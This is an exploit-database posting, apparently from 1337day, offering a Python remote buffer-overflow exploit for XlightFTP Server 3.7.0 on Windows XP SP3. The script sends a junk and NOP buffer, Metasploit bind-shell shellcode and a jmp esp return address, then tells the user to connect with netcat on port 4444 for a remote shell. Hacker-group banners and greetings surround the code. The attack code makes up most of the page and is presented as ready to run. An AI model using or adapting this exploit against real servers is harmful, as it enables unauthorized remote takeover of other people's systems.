Home / exploits XlightFTP Server 3.7.0 Buffer Overflow
Posted on 19 August 2011
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ### # Title : XlightFTP Server v3.7.0 Remote Root BOF Exploit # Author : KedAns-Dz # E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com # Home : Hassi.Messaoud (30008) - Algeria -(00213555248701) # Web Site : www.1337day.com * www.exploit-id.com * www.dis9.com # Facebook : http://facebook.com/KedAns # platform : windows # Impact : Remote Root Exploit & Buffer Overflow (in version 3.7.0) # Tested on : Windows XP SP3 (Fr) ## # [Indoushka & SeeMe] => Welcome back Br0ther's <3 ^^ <3 ## # | >> --------+++=[ Dz Offenders Cr3w ]=+++------- << | # | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 | # | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * T0xic | # | ------------------------------------------------ < | # + All Dz .. This is Open Group 4 L33T Dz Hax3rZ .. ### #----------------[ Exploit Code ]----------=> #!/usr/bin/python from socket import * import sys, struct, os, time print " XlightFTP Server v3.7.0 Remote Root BOF Exploit" if (len(sys.argv) < 3): print " XlightFTP Server v3.7.0 Remote Root BOF Exploit" print " Usage: %s <host> <port> " %(sys.argv[0]) sys.exit() print " [!] Connecting to %s ..." %(sys.argv[1]) # connect to host sock = socket(AF_INET,SOCK_STREAM) sock.connect((sys.argv[1],int(sys.argv[2]))) sock.recv(1024) time.sleep(5) #------------------------------------------- buffer = "x41" * 1337 # Junk buffer += "x90" * 123 # padding #------------------------------------------- # windows/shell_bind_tcp - 368 bytes # Encoder: x86/shikata_ga_nai (http://www.metasploit.com) # LPORT=4444, RHOST=192.168.1.2, EXITFUNC=process buffer += ("x33xc9xbfxb8xf7xfdxd9xdaxd8xd9x74x24xf4xb1"+ "x56x5dx83xc5x04x31x7dx0dx03x7dxb5x15x08x25"+ "x2dx50xf3xd6xadx03x7dx33x9cx11x19x37x8cxa5"+ "x69x15x3cx4dx3fx8exb7x23xe8xa1x70x89xcex8c"+ "x81x3fxcfx43x41x21xb3x99x95x81x8ax51xe8xc0"+ "xcbx8cx02x90x84xdbxb0x05xa0x9ex08x27x66x95"+ "x30x5fx03x6axc4xd5x0axbbx74x61x44x23xffx2d"+ "x75x52x2cx2ex49x1dx59x85x39x9cx8bxd7xc2xae"+ "xf3xb4xfcx1exfexc5x39x98xe0xb3x31xdax9dxc3"+ "x81xa0x79x41x14x02x0axf1xfcxb2xdfx64x76xb8"+ "x94xe3xd0xddx2bx27x6bxd9xa0xc6xbcx6bxf2xec"+ "x18x37xa1x8dx39x9dx04xb1x5ax79xf9x17x10x68"+ "xeex2ex7bxe5xc3x1cx84xf5x4bx16xf7xc7xd4x8c"+ "x9fx6bx9dx0ax67x8bxb4xebxf7x72x36x0cxd1xb0"+ "x62x5cx49x10x0ax37x89x9dxdfx98xd9x31x8fx58"+ "x8axf1x7fx31xc0xfdxa0x21xebxd7xd7x65x25x03"+ "xb4x01x44xb3x2bx8exc1x55x21x3ex84xcexddxfc"+ "xf3xc6x7axfexd1x7axd3x68x6dx95xe3x97x6exb3"+ "x40x3bxc6x54x12x57xd3x45x25x72x73x0fx1ex15"+ "x09x61xedx87x0exa8x85x24x9cx37x55x22xbdxef"+ "x02x63x73xe6xc6x99x2ax50xf4x63xaax9bxbcxbf"+ "x0fx25x3dx4dx2bx01x2dx8bxb4x0dx19x43xe3xdb"+ "xf7x25x5dxaaxa1xffx32x64x25x79x79xb7x33x86"+ "x54x41xdbx37x01x14xe4xf8xc5x90x9dxe4x75x5e"+ "x74xadx86x15xd4x84x0exf0x8dx94x52x03x78xda"+ "x6ax80x88xa3x88x98xf9xa6xd5x1ex12xdbx46xcb"+ "x14x48x66xde") #------------------------------------- buffer += "x90" * 8 # more nop's #------------------------------------- buffer += "x07xd5xc5x7c" # jmp esp in shell32.dll (Windows XP SP3 - Universal) buffer += "x0a" # end connection # send buffer print "[*] Sending Buffer Junk..." time.sleep(2) print "[*] Spawn a Backshell Connecting..." sock.send(buffer) sock.recv(1024) sock.close() print "[+] Exploit succeed. Now NetCat %s on port 4444 " %(sys.argv[1]) print " > Exploit By : KedAns-Dz - Dz Offenders Cr3w - Inj3ct0r Team" sys.exit() #-------------------[ End ]----------------<< # | >> --------+++=[ Dz Offenders Cr3w ]=+++------- << | # | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 | # | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * T0xic | # | ------------------------------------------------ < | #================[ Exploited By KedAns-Dz * Inj3ct0r * ]========================================= # Greets To : Dz Offenders Cr3w < Algerians HaCkerS > + Rizky Ariestiyansyah * HMD 1850 BBs (all) # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu # gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r * Kalashinkov3 (www.1337day.com/team) # Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X # Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * T0xic * www.packetstormsecurity.org * TreX (hotturks.org) # www.metasploit.com * Underground Exploitation (www.dis9.com) * All Security and Exploits Webs .. # -+-+-+-+-+-+-+-+-+-+-+-+={ Greetings to Friendly Teams : }=+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- # (D) HaCkerS-StreeT-Team (Z) | Inj3ct0r | Exploit-ID | UE-Team | PaCket.Storm.Sec TM | Sec4Ever # h4x0re-Sec | Dz-Ghost | INDONESIAN CODER | HotTurks | IndiShell | D.N.A | DZ Team | Milw0rm # Indian Cyber Army | MetaSploit | BaCk-TraCk | AutoSec.Tools | HighTech.Bridge SA | Team DoS-Dz #================================================================================================
